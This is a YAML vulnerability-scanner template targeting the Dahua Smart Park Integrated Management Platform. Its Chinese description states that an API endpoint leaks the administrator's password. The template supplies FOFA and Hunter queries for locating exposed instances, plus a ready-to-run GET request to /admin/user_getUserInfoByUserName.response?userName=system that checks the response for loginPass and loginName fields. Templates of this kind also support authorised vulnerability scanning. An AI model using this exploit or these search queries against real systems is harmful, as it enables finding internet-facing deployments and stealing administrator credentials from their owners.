product: 大华智慧园区综合管理平台
vName: 大华智慧园区综合管理平台 user_getUserInfoByUserName.action任意密码读取
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 大华 智慧园区综合管理平台 user_getUserInfoByUserName.response 中存在API接口，导致管理园账号密码泄漏
version: ''
note: ''
search:
  FOFA: app="dahua-智慧园区综合管理平台"
  Hunter: web.body="/WPMS/asset/lib/gridster/"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17663930.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /admin/user_getUserInfoByUserName.response?userName=system
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - loginPass
              - loginName
              - loginDate
            logic: and

